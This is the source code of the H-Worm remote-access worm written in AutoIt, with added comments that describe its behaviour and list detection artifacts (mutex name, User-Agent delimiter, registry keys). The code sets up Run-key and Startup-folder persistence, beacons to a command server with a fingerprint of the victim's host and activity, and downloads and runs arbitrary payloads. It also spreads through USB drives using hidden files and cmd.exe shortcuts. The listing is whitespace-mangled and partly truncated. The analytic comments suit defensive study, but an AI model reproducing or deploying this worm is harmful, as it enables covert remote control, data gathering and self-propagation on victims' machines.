  1. # Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  2. H-WORM UNDER WORLD (AUTOIT VERSION) \
  3. = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  4.  
  5. CODER:
  6. HOUDINI (C) - WWW.DEV-POINT.COM
  7.  
  8. COMPILED LANGUAGE:
  9. AUTOIT V 3.0
  10.  
  11. VISIT OWR FOR MORE INFO OR CONTACT ME IN:
  12. SKYPE: HOUDINI-FX
  13.  
  14. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  15.  
  16. # INCLUDE <PROCESS.AU3>
  17. # INCLUDE <WINAPI.AU3>
  18. # INCLUDE <FILE.AU3>
  19. # NOTRAYICON
  20.  
  21. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  22. WORM CONFIG
  23. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  24.  
  ; Worm configuration.
  ; NOTE: this whole listing is whitespace-mangled (tokens split like "$ IP_ADDR", "__ POST",
  ; "# INCLUDE"), so it is not compilable as pasted; the comments describe the intended code.
  ; $IP_ADDR / $PORT feed the HTTP beacon in __POST (the loopback value here means this copy
  ; beacons to the local host -- presumably a placeholder). $INSTALL_DIR is where __INIT copies
  ; the executable and what the __STARTUP Run-key entries point to.
  25. LOCAL $ IP_ADDR = "127.0.0.1"
  26. LOCAL $ PORT = "40055"
  27. LOCAL $ INSTALL_DIR = @ TEMPDIR
  28.  
  29.  
  30. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  31. WORM VARIABLE
  32. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  33.  
  ; Runtime globals shared by the functions below.
  ; $CIMV2: WMI connection used by __OPERATING_SYSTEM and __SECURITY_CENTER to fingerprint the host.
  34. LOCAL $ CIMV2 = OBJGET ("WINMGMTS: {IMPERSONATIONLEVEL = IMPERSONATE}! \ \. \ ROOT \ CIMV2")
  ; Field separator of the C2 protocol: splits server commands and joins the User-Agent fingerprint.
  ; A stable literal to match on in proxy / IDS logs.
  35. LOCAL $ SPLITTER = "<|>"
  ; Reported to the C2 and embedded in the mutex name built by __ONE_INSTANCE.
  36. LOCAL $ WORM_VERSION = "H-WORM (AUTOIT)"
  ; "TRUE"/"FALSE" as a string; set from a registry marker by __IS_USB_SPREADING and reported to the C2.
  37. LOCAL $ USB_SPREADING = "FALSE"
  ; Last command received (split on $SPLITTER), the instance-mutex handle, and the split parts of
  ; @SCRIPTFULLPATH -- $WZFNAME doubles as the Run-key value name and the download sub-folder name.
  38. LOCAL $ SERVER_CMD
  39. LOCAL $ W_METUX
  40. LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT
  41.  
  42.  
  43. # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  44. WORM CODE: START
  45. # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
  46.  
  ; Main loop. Runs only as a compiled executable; installs itself (__INIT), then every 5 s
  ; re-copies itself to removable drives, re-writes its persistence entries and polls the C2
  ; for a single command.
  47. IF NOT @ COMPILED THEN EXIT
  48. __INIT ()
  49. WHILE TRUE
  50. __USB_SPREADING ()
  51. __STARTUP ()
  ; Beacon: GET http://$IP_ADDR:$PORT/I_AM_READY with the host fingerprint as the User-Agent
  ; (see __POST / __INFORMATIOM). The upper-cased response body is the command; fields split on "<|>".
  52. $ SERVER_CMD = __ POST ("I_AM_READY")
  53. $ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ SPLITTER, 1)
  ; Command dispatch. Whatever the server returns is acted on with no authentication or integrity
  ; check -- the transport is plain HTTP.
  54. SELECT
  ; UNINSTALL: revert the USB artifacts, delete both Run-key values and the Startup-folder copy, exit.
  55. CASE $ SERVER_CMD [1] = "UNINSTALL"
  56. CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
  57. __USB_SPREADING ($ SERVER_CMD [1])
  58. REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  59. REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
  60. FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
  61. EXIT
  ; UPDATE: release the instance mutex, fetch a new binary and run it with "/ UPDATE" (handled in __INIT).
  62. CASE $ SERVER_CMD [1] = "UPDATE"
  63. CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
  64. _WINAPI_CLOSEHANDLE ($ W_METUX)
  65. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
  66. EXIT
  ; SEND: fetch an arbitrary file from the C2 and run it.
  67. CASE $ SERVER_CMD [1] = "SEND"
  68. CONSOLEWRITE ("SEND" & $ SERVER_CMD [2] & @ CRLF)
  69. __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
  ; EXCECUTE (sic -- the misspelling is part of the wire protocol and a usable network signature):
  ; fetch an AutoIt .a3x script and run it through __RUNA3X.
  70. CASE $ SERVER_CMD [1] = "EXCECUTE"
  71. CONSOLEWRITE ("EXCECUTE" & $ SERVER_CMD [2] & @ CRLF)
  72. __RUNA3X ($ SERVER_CMD [2])
  73. ENDSELECT
  74. SLEEP (5000)
  75. WEND
  76.  
  77.  
  ; Install step. If not already running from $INSTALL_DIR, copy self there (FileCopy flag 1+8 =
  ; overwrite + create destination path), launch that copy and exit. Otherwise take the instance
  ; mutex and read/initialise the USB-spreading marker.
  78. FUNC __ INIT ()
  79.  
  ; Fills the globals $WZDRIVE..$WZEXT; the base name $WZFNAME is reused as the Run-key value name.
  80. _PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
  81. IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ INSTALL_DIR & "\" & @ SCRIPTNAME)) THEN
  ; "/ UPDATE" is passed by the UPDATE command path. The copy is retried until it succeeds --
  ; presumably because the previous instance may still hold the target file -- with no other exit
  ; condition, so a persistent copy failure spins here forever.
  82. IF ($ CMDLINE [0]> 0) AND ($ CMDLINE [1] = "/ UPDATE") THEN
  83. DO
  84. UNTIL FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8) = 1
  85. ELSE
  86. FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8)
  87. ENDIF
  88. SHELLEXECUTE ($ INSTALL_DIR & "\" & @ SCRIPTNAME)
  89. EXIT
  90. ENDIF
  91. __ONE_INSTANCE ()
  92. __IS_USB_SPREADING ()
  93. ENDFUNC
  94.  
  95.  
  96.  
  ; Download a file named by the C2 and optionally execute it.
  ;   $FILE : name echoed back to the server in the "IS-SENDING<|><name>" request and used for the local file name.
  ;   $RUN  : when TRUE the downloaded file is launched via ShellExecute with $CMD as its arguments.
  ;   Returns the drop path: @SCRIPTDIR\$WZFNAME\<name><ext> (a host artifact to look for).
  ; $RESULT is never declared LOCAL, so it becomes a global. There is no error handling: a failed
  ; InetRead yields empty data, which is still written out (and, with $RUN, launched).
  97. FUNC __ DAWONLOAD_AND_EXEC ($ FILE, $ RUN = TRUE, $ CMD = "")
  98.  
  99. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  100. LOCAL $ FGET_HANDEL
  101.  
  102. _PATHSPLIT ($ FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  ; "STREAM" makes __POST return the raw response bytes instead of upper-cased text.
  103. $ RESULT = __ POST ("IS-SENDING" & $ SPLITTER & $ FILE, "STREAM")
  ; FileOpen flags 16+2+8 = binary, write (truncate), create the directory path.
  104. $ FGET_HANDEL = FILEOPEN (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, 16 +2 +8)
  105. FILEWRITE ($ FGET_HANDEL, $ RESULT)
  106. FILECLOSE ($ FGET_HANDEL)
  107. IF $ RUN THEN SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, $ CMD)
  108. RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT
  109. ENDFUNC
  110.  
  111.  
  112.  
  113.  
  ; Run an AutoIt .a3x script fetched from the C2. Copies the running AutoIt interpreter
  ; (@AUTOITEXE) to @SCRIPTDIR\$WZFNAME\<name>.EXE, downloads the script bytes into a DllStruct and
  ; -- judging by the EndUpdateResource call that survives -- embeds them into that copy as a
  ; resource before launching it with $CMD. Lines 126-128 of this paste are truncated/garbled (the
  ; DllCall that opens and writes the resource has lost its arguments), so the block is not
  ; compilable as shown. Host artifact: a renamed copy of the AutoIt interpreter under the install
  ; directory, spawned as a child of the worm process.
  114. FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")
  115.  
  116. LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
  117. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
  118. LOCAL $ FGET_HANDEL
  119.  
  120. _PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  121. FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
  122. $ A3X_DATA = __ POST ("IS-SENDING" & $ SPLITTER & $ A3X_FILE, "STREAM")
  123. $ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3X [" & BINARYLEN ($ A3X_DATA) & "]")
  124. DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3X", $ A3X_DATA)
  125.  
  ; Truncated in this paste -- see the note above.
  126. $ H_RESOURCE = DLLCALL
  127. IF $ H_RESOURCE [0] <> 0 THEN
  128. DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
  129. DLLCALL ("KERNEL32.DLL", "BOOL", "EndUpdateResource", "HANDLE", $ H_RESOURCE [0], "BOOL", FALSE)
  130. SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
  131. ENDIF
  132. ENDFUNC
  133.  
  134.  
  135.  
  136.  
  ; C2 transport: one HTTP GET to http://$IP_ADDR:$PORT/<$DATA>, with the host fingerprint from
  ; __INFORMATIOM sent as the User-Agent. InetRead flag 1 forces a reload (no cache).
  ;   $TYPE "TEXT"  : the response is decoded and upper-cased (command replies).
  ;   anything else : the raw binary response is returned (file / script payloads).
  ; Cleartext and unauthenticated; the "<|>"-delimited fingerprint in the User-Agent header is the
  ; natural network detection point for this family.
  137. FUNC __ POST ($ DATA, $ TYPE = "TEXT")
  138.  
  139. LOCAL $ RESULT
  140.  
  141. HTTPSETUSERAGENT (__INFORMATIOM ())
  142. $ RESULT = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATA, 1)
  143. IF $ TYPE = "TEXT" THEN RETURN STRINGUPPER (BINARYTOSTRING ($ RESULT))
  144. RETURN $ RESULT
  145. ENDFUNC
  146.  
  147.  
  ; Persistence, re-applied on every main-loop iteration (removing a single entry is undone within
  ; ~5 s while the process lives). Artifacts: Run values named $WZFNAME under both HKLM and HKCU
  ; ...\CurrentVersion\Run pointing at "$INSTALL_DIR\<scriptname>" (return values are unchecked, so
  ; the HKLM write simply fails without admin rights), plus a copy of the executable in the user's
  ; Startup folder.
  148. FUNC __ STARTUP ()
  149.  
  150. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  151. REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
  152. FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
  153. ENDFUNC
  154.  
  155.  
  ; Build the host fingerprint sent as the HTTP User-Agent on every beacon. Fields joined by "<|>":
  ; home-drive serial (8 hex digits), computer name, user name, OS caption, worm version, AV and
  ; firewall product names (two fields from __SECURITY_CENTER), the USB-spreading flag, and the
  ; foreground window title plus its process name. The misspelled function name is kept as-is
  ; because callers use it.
  156. FUNC __ INFORMATIOM ()
  157.  
  158. LOCAL $ INFORAMTION = ""
  159.  
  160. $ INFORAMTION = $ INFORAMTION & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
  161. $ INFORAMTION = $ INFORAMTION & @ COMPUTERNAME & $ SPLITTER
  162. $ INFORAMTION = $ INFORAMTION & @ USERNAME & $ SPLITTER
  163. $ INFORAMTION = $ INFORAMTION & __ OPERATING_SYSTEM () & $ SPLITTER
  164. $ INFORAMTION = $ INFORAMTION & $ WORM_VERSION & $ SPLITTER
  165. $ INFORAMTION = $ INFORAMTION & __ SECURITY_CENTER () & $ SPLITTER
  166. $ INFORAMTION = $ INFORAMTION & $ USB_SPREADING & $ SPLITTER
  167. $ INFORAMTION = $ INFORAMTION & __ TOP_WINDOWS ()
  168. RETURN $ INFORAMTION
  169.  
  170. ENDFUNC
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  ; OS caption via WMI: Win32_OperatingSystem.Caption of the first row, with a trailing ".".
  ; Returns "" when the query yields no rows; COM errors are not handled.
  177. FUNC __ OPERATING_SYSTEM ()
  178.  
  179. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  180. LOCAL $ OS_CAPTION = ""
  181.  
  182. FOR $ OS IN $ OPERATINGSYSTEM
  183. $ OS_CAPTION = $ OS.CAPTION & "."
  184. EXITLOOP
  185. NEXT
  186. RETURN $ OS_CAPTION
  187. ENDFUNC
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  ; Enumerate registered antivirus and firewall products through WMI. Uses root\SecurityCenter2
  ; when the numeric OS version is > 6, else root\SecurityCenter. Returns "<av names><|><fw names>",
  ; substituting "NO AV" / "NO FW" for an empty list.
  ; Observations: $OBJ_SECURITY_CENTER is not declared LOCAL (it becomes a global); the "&=" combined
  ; with an explicit self-concatenation doubles the accumulated text on every iteration, so the
  ; reported list is malformed whenever more than one product is registered.
  194. FUNC __ SECURITY_CENTER ()
  195.  
  196.  
  197. LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
  198. LOCAL $ OS_VERSION
  199. LOCAL $ SECURITY_CENTER = "SECURITYCENTER"
  200.  
  201. FOR $ OS IN $ OPERATINGSYSTEM
  202. $ OS_VERSION = NUMBER ($ OS.VERSION)
  203. NEXT
  204. IF $ OS_VERSION> 6 THEN $ SECURITY_CENTER = "SECURITYCENTER2"
  205. $ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS: \ \. \ ROOT \" & $ SECURITY_CENTER)
  206.  
  207. LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
  208. LOCAL $ ANTI_VIRUSE = ""
  209. LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
  210. LOCAL $ FIRE_WALL = ""
  211.  
  212. FOR $ OBJ_ANTI_VIRUS IN $ COL_ANTI_VIRUS
  213. $ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME & "."
  214. NEXT
  215.  
  216. FOR $ OBJ_FIRE_WALL IN $ COL_FIRE_WALL
  217. $ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME & "."
  218. NEXT
  219.  
  220. IF $ ANTI_VIRUSE = "" THEN $ ANTI_VIRUSE = "NO AV"
  221. IF $ FIRE_WALL = "" THEN $ FIRE_WALL = "NO FW"
  222.  
  ; Literal "<|>" rather than $SPLITTER -- same value, so the caller sees two fingerprint fields.
  223. RETURN $ ANTI_VIRUSE & "<|>" & $ FIRE_WALL
  224. ENDFUNC
  225.  
  226.  
  227.  
  228.  
  229.  
  ; Snapshot of user activity: the foreground window's title and the name of the process that owns
  ; it, formatted "<title>- [<process>]". Included in every beacon via __INFORMATIOM, so the C2 sees
  ; what the user is doing at each 5 s poll.
  230. FUNC __ TOP_WINDOWS ()
  231.  
  232. LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
  233. LOCAL $ WINTOP_PID, $ WINTOP_PNAME
  234. _WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
  235. $ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)
  236.  
  237. RETURN $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME & "]"
  238. ENDFUNC
  239.  
  240.  
  241.  
  242.  
  243.  
  ; Single-instance guard using a named mutex "<$WZFNAME>_H-WORM (AUTOIT)". Exits if creation
  ; fails or the mutex already exists (Win32 error 183, ERROR_ALREADY_EXISTS). The mutex name is a
  ; host-based detection artifact; the handle is kept in $W_METUX and closed by the UPDATE path so
  ; the replacement binary can start.
  244. FUNC __ ONE_INSTANCE ()
  245.  
  246. $ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME & "_" & $ WORM_VERSION)
  247. IF (@ ERROR) OR (_WINAPI_GETLASTERROR () = 183) THEN EXIT
  248. ENDFUNC
  249.  
  250.  
  251.  
  ; Visit every READY removable drive and apply $TYPE ("INSTALL" by default, "UNINSTALL" from the
  ; uninstall command) to its top-level entries through __IFOLDERS / __CALLBACK.
  ; Returns silently when no removable drive is present. $DISK is an undeclared global.
  252. FUNC __ USB_SPREADING ($ TYPE = "INSTALL")
  253.  
  254. $ DISK = DRIVEGETDRIVE ("REMOVABLE")
  255. IF NOT ISARRAY ($ DISK) THEN RETURN
  256. FOR $ I = 1 TO $ DISK [0] STEP 1
  257. IF DRIVESTATUS ($ DISK [$ I]) = "READY" THEN __ IFOLDERS ($ DISK [$ I] & "\", $ TYPE)
  258. NEXT
  259.  
  260. ENDFUNC
  261.  
  262.  
  263.  
  ; Read or initialise the USB-spreading marker: the default value of
  ; HKLM\SOFTWARE\<script name without extension>. On first run it is set to "TRUE" when the
  ; executable sits at a drive root ("X:\<scriptname>" -- presumably meaning it was launched from a
  ; removable drive) and "FALSE" otherwise. The key is another host artifact; $USB_SPREADING is a
  ; string, not a boolean.
  264. FUNC __ IS_USB_SPREADING ()
  265.  
  266. LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
  267. $ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
  268. IF $ USB_SPREADING = "" THEN
  269. $ USB_SPREADING = "FALSE"
  ; StringMid(path, 2) drops the drive letter, leaving ":\<name>" for a root-level file.
  270. IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) THEN $ USB_SPREADING = "TRUE"
  271. REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
  272. ENDIF
  273. ENDFUNC
  274.  
  275.  
  276.  
  ; Enumerate entries under $ROOT and call $CALLBACK(<path>, $TYPE) for each one.
  ; The walk is breadth-first over a growing array of paths, but with $FIRST = TRUE (the default,
  ; and what __USB_SPREADING passes) it stops after the top level. Returns the array of paths seen.
  ; "\ *" in this paste is the mangled "\*" wildcard.
  277. FUNC __ IFOLDERS ($ ROOT, $ TYPE = "INSTALL", $ FIRST = TRUE, $ CALLBACK = "__CALLBACK")
  278.  
  279. LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
  ; $G_COUNTER indexes the path being listed; $L_COUNTER counts paths appended so far.
  280. LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0
  281.  
  282. $ ENUM_ARRAY [0] = $ ROOT
  283. DO
  284. $ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
  285. DO
  286. $ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
  287. IF NOT @ ERROR AND $ FIND_NAME <> "" THEN
  288. REDIM $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) +1]
  289. $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
  290. CALL ($ CALLBACK, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TYPE)
  291. $ L_COUNTER + = 1
  292. ENDIF
  293. UNTIL @ ERROR OR $ FIND_NAME = ""
  294. FILECLOSE ($ H_SEARCH)
  ; Top-level only when $FIRST is TRUE.
  295. IF $ FIRST = TRUE AND $ G_COUNTER = 0 THEN EXITLOOP
  296. $ G_COUNTER + = 1
  297. UNTIL $ G_COUNTER> $ L_COUNTER
  298. RETURN $ ENUM_ARRAY
  299. ENDFUNC
  300.  
  301.  
  ; Per-entry handler used during USB spreading (called from __IFOLDERS).
  ; INSTALL : skips .lnk files and the worm's own copy; drops a hidden+system copy of the worm into
  ;           the entry's directory, then puts a same-named .LNK next to each entry that runs
  ;           cmd.exe ($ARGU) to start the worm and then the original item, reusing the item's
  ;           registered DefaultIcon, and finally hides the original (+HS).
  ; UNINSTALL : deletes the shortcuts and worm copies and clears the hidden+system attributes.
  ; Host artifacts on removable media: hidden+system files and .LNK files whose target is cmd.exe.
  302. FUNC __ CALLBACK ($ PATH, $ TYPE)
  303.  
  304. LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ ARGU
  305. _PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
  306.  
  307. IF $ TYPE = "INSTALL" THEN
  308. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN RETURN
  309. FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
  310. FILESETATTRIB ($ SZDRIVE & $ SZDIR & @ SCRIPTNAME, "+ HS")
  ; cmd.exe argument string for the shortcut; both names are re-quoted with Chr(34).
  311. $ ARGU = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& START" & STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
  ; Icon lookup: by file-type association for files, the Folder DefaultIcon for directories.
  312. IF NOT STRINGINSTR (FILEGETATTRIB ($ PATH), "D") THEN
  313. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & $ SZEXT, "") & "\ DEFAULTICON", "")
  314. ELSE
  315. $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \ FOLDER \ DEFAULTICON", "")
  316. ENDIF
  ; DefaultIcon is "file" or "file,index"; "%1" means "use the file itself".
  317. $ SZICON = STRINGSPLIT ($ SZICON, ",")
  318. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1") = 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ SZICON [1], "", "", @ SW_HIDE)
  319. IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1")> 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ PATH, "", "", @ SW_HIDE)
  320. IF ($ SZICON [0] = 2) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
  321. FILESETATTRIB ($ PATH, "+ HS")
  322. ENDIF
  323. IF $ TYPE = "UNINSTALL" THEN
  324. IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN FILEDELETE ($ PATH)
  325. FILESETATTRIB ($ PATH, "-HS")
  326. ENDIF
  327.  
  328. ENDFUNC
  329.  
  330.  
  ; Thin CreateMutexW wrapper (defined locally rather than taken from a UDF).
  ;   $SMUTEX   : mutex name;  $FINITIAL : initial-owner flag;  $TSECURITY : security-attributes struct or 0.
  ; Returns the handle, or 0 with @error = 1 when the DllCall fails or yields a NULL handle.
  ; ERROR_ALREADY_EXISTS is not surfaced here; the caller reads it via _WinAPI_GetLastError (see __ONE_INSTANCE).
  331. FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)
  332.  
  333. LOCAL $ RET = DLLCALL ('KERNEL32.DLL', 'PTR', 'CreateMutexW', 'PTR', DLLSTRUCTGETPTR ($ TSECURITY), 'INT', $ FINITIAL, 'WSTR', $ SMUTEX)
  334. IF (@ ERROR) OR (NOT $ RET [0]) THEN
  335. RETURN SETERROR (1, 0, 0)
  336. ENDIF
  337. RETURN $ RET [0]
  338. ENDFUNC